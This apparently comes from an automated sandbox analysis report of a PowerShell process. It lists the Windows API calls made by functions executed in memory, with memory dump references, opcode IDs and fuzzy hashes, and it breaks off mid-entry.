                                                        Function 01CA23BC, Relevance: .0, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120421678.0000000001CA2000.00000040.00000001.sdmp, Offset: 01CA2000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 285b2982a0affb3fd78d8f39a2bb8ad111b7dc6e6f60cf684530f7bee8d5dca8
                                                        • Instruction ID: a37fc8805144ec47d6e921c8f45722f57b0bd9d5295dd9273c7daf2afa58f7a9
                                                        • Opcode Fuzzy Hash: 285b2982a0affb3fd78d8f39a2bb8ad111b7dc6e6f60cf684530f7bee8d5dca8
                                                        • Instruction Fuzzy Hash: F6D05E343016828FEB16CA1CC194F5977E8AF41B04F4644E8BD008B266C3A8E980C600
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Analysis Process: powershell.exe PID: 2252 Parent PID: 2692 powershell.exeCOMMON

                                                        Executed Functions

                                                        Function 020DACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 020DAD37
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: cfd9084068ee0ede45ecdd0147cdbd492a98c21e839bbf6ad35dea8fa2bc7d8e
                                                        • Instruction ID: d30116a83c94ea3379a26ab9ffa08bfff0afe9d056f453add8afeb86edf7c0a6
                                                        • Opcode Fuzzy Hash: cfd9084068ee0ede45ecdd0147cdbd492a98c21e839bbf6ad35dea8fa2bc7d8e
                                                        • Instruction Fuzzy Hash: 68219F765097849FEB238F25DC45B92BFF4EF06310F08849AE9858B563D371E908DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020DACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 020DAD37
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: 5837d0e4fd6212091ed95ea5b480ab28fa01acabf6ccdcfbd4f3e95024f4e58a
                                                        • Instruction ID: ac67cb5d7a39e6670f09715628c7090cc84b1bb7a218c8357697eadca18f85e0
                                                        • Opcode Fuzzy Hash: 5837d0e4fd6212091ed95ea5b480ab28fa01acabf6ccdcfbd4f3e95024f4e58a
                                                        • Instruction Fuzzy Hash: 3611AC76600700DFEB21CF55D884BA6FBE4EF05221F08C4AAED4A8B662D731E414DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020DB2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 020DB329
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: de20c06547d263b5eed0d94d61da5e32a1c299eaa1f5699a7a2c953e211f548a
                                                        • Instruction ID: 5a03c4afc3a6601c4633d8da46700a29e8a3cd396f0363930369417a60515ac2
                                                        • Opcode Fuzzy Hash: de20c06547d263b5eed0d94d61da5e32a1c299eaa1f5699a7a2c953e211f548a
                                                        • Instruction Fuzzy Hash: BA11A071509380AFDB228F15DC85F52FFF4EF46224F09C49AED884B662C275A818DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020DB2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 020DB329
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: 10d71a4f98b37ca541a090ef5d1901eb10bb7ae3e3f9643906dba1bb8fc668f0
                                                        • Instruction ID: a509cfe05b1dd1964f10da7f295b2968918659ec5d03becc1a4a864fe4980845
                                                        • Opcode Fuzzy Hash: 10d71a4f98b37ca541a090ef5d1901eb10bb7ae3e3f9643906dba1bb8fc668f0
                                                        • Instruction Fuzzy Hash: 6D01A932800700DFEB218F49D885B26FBE0EF08725F08C09ADD890B612C372E418EB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02830118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 028301D0
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: 13fce08cedba2b81000f4502f5b49bbcbe77cdea7ce03888e65272a6002035bc
                                                        • Instruction ID: 19c00e5a32bb5e738188d5624ae4b699acc3c9e8b871bed0557c57144ee489f6
                                                        • Opcode Fuzzy Hash: 13fce08cedba2b81000f4502f5b49bbcbe77cdea7ce03888e65272a6002035bc
                                                        • Instruction Fuzzy Hash: BC31396650E3C09FE7138B759C65692BFB4AF43210F0E84DBD884CF1A3D6299809D7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0283067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0283072D
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 4cecf85f6d36f0535b7207c9ba7a52c0ed2f67b22ee30a6752bf48e0801aa6ab
                                                        • Instruction ID: f51a776608bdd5f862abe039ef2c7dbc578be15545679f75a36c873e13c9d01b
                                                        • Opcode Fuzzy Hash: 4cecf85f6d36f0535b7207c9ba7a52c0ed2f67b22ee30a6752bf48e0801aa6ab
                                                        • Instruction Fuzzy Hash: A2317075505380AFE722CF65CC85F52BFF8EF06214F09849EE988CB292D325A808CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02830D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02830DD6
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: 486b93897bf784ed9774a9937b0c8ee20415766fbf9b85c4586dcb6a76519553
                                                        • Instruction ID: dbb55ca57781f0d510eeb684c24541e7ecfc0127937959f3e68be0b4875dd83e
                                                        • Opcode Fuzzy Hash: 486b93897bf784ed9774a9937b0c8ee20415766fbf9b85c4586dcb6a76519553
                                                        • Instruction Fuzzy Hash: BD319875509380AFE712CB65DC45B96BFE8DF06314F0884AAE948CF293D375A905C772
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020DBD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,9797AD96,00000000,00000000,00000000,00000000), ref: 020DBDBC
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: fcdbea1723bef2a68bcfa832f3a9145e2a392bc4a8b7ad0782d919e7e61b1cec
                                                        • Instruction ID: b96fb59905d6233b8577d4da996fbdc912d75244bac1a619a2974a9b6e1cf4bf
                                                        • Opcode Fuzzy Hash: fcdbea1723bef2a68bcfa832f3a9145e2a392bc4a8b7ad0782d919e7e61b1cec
                                                        • Instruction Fuzzy Hash: 2531B472409380AFE722CB61CC45F96BFB8EF06210F09849BE984CB192D225A908C761
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020DAF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,9797AD96,00000000,00000000,00000000,00000000), ref: 020DAFBE
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: c98abe017a43e4acbb12a959907497983599896dd012b314d5c0682403cc9827
                                                        • Instruction ID: 7b9db5d04521b70011071872039f86a14e1310766aa4523e7d2d5a47492f8065
                                                        • Opcode Fuzzy Hash: c98abe017a43e4acbb12a959907497983599896dd012b314d5c0682403cc9827
                                                        • Instruction Fuzzy Hash: DB21E4B2509380AFE712CF60DC45B96BFB8EF06324F0984DBE984DB193C265A949C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02830FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0283109E
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: e1fd697016dd16de54f64f17db7ea84ddd5df8c530ccce60ffd5e9d00803d794
                                                        • Instruction ID: 6b4e9ac3da14e143b3184f6be4c3617211ebb85e3f581a4bd03878bb95f961ef
                                                        • Opcode Fuzzy Hash: e1fd697016dd16de54f64f17db7ea84ddd5df8c530ccce60ffd5e9d00803d794
                                                        • Instruction Fuzzy Hash: 47316F7550E3C0AFD3138B358C55B56BFB4EF43610F1A81DBD8848F2A3D629A909C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020DB01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,9797AD96,00000000,00000000,00000000,00000000), ref: 020DB0AE
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: c2e1e83a66a1374b3b06132e0b53ecd458837a9ec7ffae19e3a2d9e1506466cf
                                                        • Instruction ID: 04c8972f4951e08025e6fd9d8eda8fee522cf6e6df2f2896b44cfa993b13b769
                                                        • Opcode Fuzzy Hash: c2e1e83a66a1374b3b06132e0b53ecd458837a9ec7ffae19e3a2d9e1506466cf
                                                        • Instruction Fuzzy Hash: AE21D171509380AFE722CF15CC45FA6BFF8EF46224F0984ABE945CB192D664E908CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020DA1A8, Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnumWindows.USER32(?,00000E9C,?,?), ref: 020DA23E
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumWindows
                                                        • String ID:
                                                        • API String ID: 1129996299-0
                                                        • Opcode ID: e14a1a045c33ec19de11e3fa3b9b5826a46bbf70d78bb17aee896206d0e0f201
                                                        • Instruction ID: 847e69a69acb48ddffb8f7185949330d3983b51b213a396aa7273eb623aa2c75
                                                        • Opcode Fuzzy Hash: e14a1a045c33ec19de11e3fa3b9b5826a46bbf70d78bb17aee896206d0e0f201
                                                        • Instruction Fuzzy Hash: D921E27150D3C16FD3028B258C55B66BFB4EF87220F0981DBD884CF293D229A809C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02830784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,9797AD96,00000000,00000000,00000000,00000000), ref: 02830819
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: 884338cb408f010598652ed38cee96534df45c6ab555fda5b50919f8175a5559
                                                        • Instruction ID: 6fb2694bea6527d66cfe0bfb4844eb717a57e5dac5873a02456d18f2e0545551
                                                        • Opcode Fuzzy Hash: 884338cb408f010598652ed38cee96534df45c6ab555fda5b50919f8175a5559
                                                        • Instruction Fuzzy Hash: 1621C876408780AFE712CB159C45BA3BFA8EF46724F0981DAE9888B193D224A905C7B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02830464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02830502
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: f84c83ccae2b126370cdb5e70cfd9192a8285d8db30afd8ddbb5629268cf1a62
                                                        • Instruction ID: b46e75f2ee1cc673701c6ee1bfa7efdf143a3d0138c002b493757c9cbf7bdb2c
                                                        • Opcode Fuzzy Hash: f84c83ccae2b126370cdb5e70cfd9192a8285d8db30afd8ddbb5629268cf1a62
                                                        • Instruction Fuzzy Hash: 9421717540E3C0AFD3128B758C55B62BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028306AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0283072D
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 09c51cfbf1fb07634dfbdfb56ae8554363ed357d336b436da764d0c9df0fbb1e
                                                        • Instruction ID: c0eb46d488b9a58774d9481634e650b7861f2371f4545e3c2fb2f3e7a049e5f2
                                                        • Opcode Fuzzy Hash: 09c51cfbf1fb07634dfbdfb56ae8554363ed357d336b436da764d0c9df0fbb1e
                                                        • Instruction Fuzzy Hash: 4321AE79500304EFE721DF65CC85F66FBE8EF08614F04846AE949CB292D332E804CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02830854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,9797AD96,00000000,00000000,00000000,00000000), ref: 028308E5
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 52f30ad17ee9a44f2e4e5ae7c5b57d3115ea189dadf1269ca3c6620977cfe269
                                                        • Instruction ID: 041e8bc6de252a7be52a1fbbf0e4f864f983a714d4d93bdbc52151a226338751
                                                        • Opcode Fuzzy Hash: 52f30ad17ee9a44f2e4e5ae7c5b57d3115ea189dadf1269ca3c6620977cfe269
                                                        • Instruction Fuzzy Hash: F6219276409380AFE722CF51DC45F56FFB8EF46314F0984DBE9489B153C265A909CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020DA8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 020DA94A
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        • Opcode ID: 620ea162e382f8f50933d2a6d9f086014e0e7c44a14f0ca135245dee14a0075b
                                                        • Instruction ID: 8dea9adb5d773c536a90e6f2bcbf8e339bef9a083b065452e25e646d702f956b
                                                        • Opcode Fuzzy Hash: 620ea162e382f8f50933d2a6d9f086014e0e7c44a14f0ca135245dee14a0075b
                                                        • Instruction Fuzzy Hash: 6221A77540D780AFD3138B25DC51B62BFB4EF87710F0981DBE8848B653D225A919C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02830D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02830DD6
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: 9a7e8a7cedab5b1ff181292a51e22b7894a75d0287160849539aafbd32b04ef3
                                                        • Instruction ID: eafedadabd76fc1fb8c18d9be7736f55ae0f2f15826c1214d905f7c34fefa3a6
                                                        • Opcode Fuzzy Hash: 9a7e8a7cedab5b1ff181292a51e22b7894a75d0287160849539aafbd32b04ef3
                                                        • Instruction Fuzzy Hash: 8121AE75600204AFF721DF65DC85BA6FBD8EF04214F04856AE848DB282D775F904CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020DBD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,9797AD96,00000000,00000000,00000000,00000000), ref: 020DBDBC
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: 13b93e44a8a0ff62435f893fb1e28bc8c151e4d855ebc352095e4ac39e6c8c76
                                                        • Instruction ID: 393e3af6e6c26ce3176f9d20b56ac38109346b2a3550e9bacfab130586ae40b6
                                                        • Opcode Fuzzy Hash: 13b93e44a8a0ff62435f893fb1e28bc8c151e4d855ebc352095e4ac39e6c8c76
                                                        • Instruction Fuzzy Hash: 86119A72501304EFEB21DF65DC85FAAFBE8EF04324F14856AF949DA241D671A9048BB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02830F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02830FB0
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: 68d0c68e5c83e2c7961178217060a30240ed35abd967367cce118f9236d59408
                                                        • Instruction ID: b18e7e566e15bdf7c48684409e3ee12ec327fa15f7caa5fd1faf5c1d95f043c0
                                                        • Opcode Fuzzy Hash: 68d0c68e5c83e2c7961178217060a30240ed35abd967367cce118f9236d59408
                                                        • Instruction Fuzzy Hash: B9214C7550D3C09FDB138B25DC55B92BFA4EF03214F0984DAD888CF693D2659408C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0283137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: 086c9977b5caaf35361a34772cfd8a7971ad3df9a12784f35b8d721403085e86
                                                        • Instruction ID: 6e457a3e1a24e628322c0b8cac4e345f7ace35531f777bfc6488cc36e5d5229c
                                                        • Opcode Fuzzy Hash: 086c9977b5caaf35361a34772cfd8a7971ad3df9a12784f35b8d721403085e86
                                                        • Instruction Fuzzy Hash: 172192765043809FDB22CF25DC45B96FFF4EF06220F08849AED898B562D235A449DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020DB04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,9797AD96,00000000,00000000,00000000,00000000), ref: 020DB0AE
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: ba61585f5155220a3446b25b95e57865c0721b63e619e619fda757cfb1b91f28
                                                        • Instruction ID: f25657bc1d77f915bfa4721cc938f22666e574c97c566356113bf384c549d8f4
                                                        • Opcode Fuzzy Hash: ba61585f5155220a3446b25b95e57865c0721b63e619e619fda757cfb1b91f28
                                                        • Instruction Fuzzy Hash: BA11AC71601300EFEB21CF15DC85FAABBE8EF44264F04846AE909CB241D670E9048BA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020DAAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 020DAB1A
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: 4e5a33156f4449b002566d0a15d6d7a58003a51d7b7cb7a58057f28cb5d05a95
                                                        • Instruction ID: e89198136eb425cf7b787c6a952ac700828578cfcd54d056b525eb65494ca08f
                                                        • Opcode Fuzzy Hash: 4e5a33156f4449b002566d0a15d6d7a58003a51d7b7cb7a58057f28cb5d05a95
                                                        • Instruction Fuzzy Hash: B32172716053809FD722CF25DC45B52BFF8EF46225F0884AAED49CB253D365E804DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020DBABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 020DBB2F
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        • String ID:
                                                        • API String ID: 3437242342-0
                                                        • Opcode ID: 209d4370595dd97fe2acb5e92fb7229022ac74d3b3cec24f03b031092182ebe1
                                                        • Instruction ID: 4e7be019f3537643b9fe4402b530ce4370b7762d1a2a73684a69dc49f8cf23cc
                                                        • Opcode Fuzzy Hash: 209d4370595dd97fe2acb5e92fb7229022ac74d3b3cec24f03b031092182ebe1
                                                        • Instruction Fuzzy Hash: 7B219F725093C09FEB128B25DC55B92BFF4EF07220F0984DADD858F263D264A908DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028310D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02831148
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: ab8b7b04c6662be549e59b6f77dcaf554f8e617ee6c27cb35aee2b6797fe3471
                                                        • Instruction ID: d0a3f2a1fc90afa4d8bfefe94b783fb577490809750a4fa99716e71bbae4154d
                                                        • Opcode Fuzzy Hash: ab8b7b04c6662be549e59b6f77dcaf554f8e617ee6c27cb35aee2b6797fe3471
                                                        • Instruction Fuzzy Hash: DD216D6540D3C09FD7138B259C54A62BFB4EF57620F0980DBDC888F2A3D2696808D7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020DAF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,9797AD96,00000000,00000000,00000000,00000000), ref: 020DAFBE
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: 56403c80714ca93f485fc3cff87396a30962d94b121ca6417f991842a75cc92a
                                                        • Instruction ID: 9db4e309a8d291d7d95a9319b85fb92e655b6b8bbb9359fe75daf07124502c00
                                                        • Opcode Fuzzy Hash: 56403c80714ca93f485fc3cff87396a30962d94b121ca6417f991842a75cc92a
                                                        • Instruction Fuzzy Hash: 9511C172501300EFEB21DF55DC85FAAFBE8EF44720F1484AAED098B281D671A904DBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02830886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,9797AD96,00000000,00000000,00000000,00000000), ref: 028308E5
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: da52f7a98258b47ee6e202fe3c20506ef600604409146545057a694f6e815fc7
                                                        • Instruction ID: ca88502029eacd53c334703b87ede0204f5b8cc85bb2ef63d00ddfd04fe4b8cf
                                                        • Opcode Fuzzy Hash: da52f7a98258b47ee6e202fe3c20506ef600604409146545057a694f6e815fc7
                                                        • Instruction Fuzzy Hash: 2C11C176400304EFFB22CF55DC85FA6FBE8EF14721F14855AED499A241C671A504CBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020DBA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 020DBA7E
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 2b8480dfa22c2a956a609be19653f61cb93cfb08d5f46cdb96ad8c9aec90b1cc
                                                        • Instruction ID: 37979879839890c06b54cee99e4b67b75044b9295199400c4f860b59f2d69519
                                                        • Opcode Fuzzy Hash: 2b8480dfa22c2a956a609be19653f61cb93cfb08d5f46cdb96ad8c9aec90b1cc
                                                        • Instruction Fuzzy Hash: 7B11B172505380AFDB22CF65CC85B52FFF4EF05210F09849EE9898B662D375E418DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028312D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0283132F
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: dd352345c22615b2722ef2cf777d9ce09cb80429f34029785c6024f3d4964feb
